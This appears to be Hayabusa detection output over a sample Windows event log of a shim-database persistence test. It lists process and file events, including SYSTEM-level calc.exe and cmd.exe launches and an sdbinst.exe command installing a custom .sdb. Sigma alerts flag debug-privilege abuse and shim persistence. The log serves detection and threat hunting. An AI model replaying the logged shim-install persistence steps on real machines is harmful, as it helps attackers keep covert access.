+2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-528D-5C91-0000-00100C580000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 632 | PGUID: 365ABB72-528F-5C91-0000-001073780000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 692 | PGUID: 365ABB72-528F-5C91-0000-0010ECB50000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 876 | PGUID: 365ABB72-528F-5C91-0000-00106BBE0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1012 | PGUID: 365ABB72-5290-5C91-0000-001033D00000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1136 | PGUID: 365ABB72-5290-5C91-0000-00104C100100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.563 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1416 | PGUID: 365ABB72-5292-5C91-0000-00101E310100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1532 | PGUID: 365ABB72-5292-5C91-0000-001036480100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-52A4-5C91-0000-0010A8560100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-52B4-5C91-0000-0010355B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-52B4-5C91-0000-0010D55B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-52B4-5C91-0000-0010C25D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-52CE-5C91-0000-00109D740100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.454 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1948 | PGUID: 365ABB72-52EC-5C91-0000-001027860100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 304 | PGUID: 365ABB72-5310-5C91-0000-001096A90100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 432 | PGUID: 365ABB72-532B-5C91-0000-00100EB40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 580 | PGUID: 365ABB72-5344-5C91-0000-001032BC0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 365ABB72-5345-5C91-0000-001019C40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1280 | PGUID: 365ABB72-5366-5C91-0000-00109FCD0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1472 | PGUID: 365ABB72-5384-5C91-0000-0010F5D70100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1564 | PGUID: 365ABB72-53A2-5C91-0000-00101FE20100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1744 | PGUID: 365ABB72-53A2-5C91-0000-001093E70100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1600 | PGUID: 365ABB72-53C0-5C91-0000-001044FC0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1904 | PGUID: 365ABB72-53DE-5C91-0000-00105C050200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1980 | PGUID: 365ABB72-53DE-5C91-0000-00104D160200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2040 | PGUID: 365ABB72-53DF-5C91-0000-0010452D0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2464 | PGUID: 365ABB72-53F2-5C91-0000-001081FE0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2640 | PGUID: 365ABB72-5418-5C91-0000-001089390300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2684 | PGUID: 365ABB72-5418-5C91-0000-0010BF400300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2692 | PGUID: 365ABB72-5418-5C91-0000-001076420300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2756 | PGUID: 365ABB72-5418-5C91-0000-0010784B0300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 2948 | PGUID: 365ABB72-543D-5C91-0000-00102FA20300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2960 | PGUID: 365ABB72-543D-5C91-0000-001099A30300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x33435 | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3068 | PGUID: 365ABB72-543E-5C91-0000-001009C90300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3080 | PGUID: 365ABB72-543E-5C91-0000-001096D00300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x33435 | PID: 3144 | PGUID: 365ABB72-543E-5C91-0000-001071E70300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3628 | PGUID: 365ABB72-546C-5C91-0000-00106A730400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2336 | PGUID: 365ABB72-550C-5C91-0000-001063E60400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | Process: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 2704 | PGUID: 365ABB72-551C-5C91-0000-001030590500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:46:25.856 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:47:56.436 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\cmd.exe | Process: C:\Windows\Explorer.EXE | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{4f02f780-dd6c-40e3-ab21-c1336815b4db}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.459 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
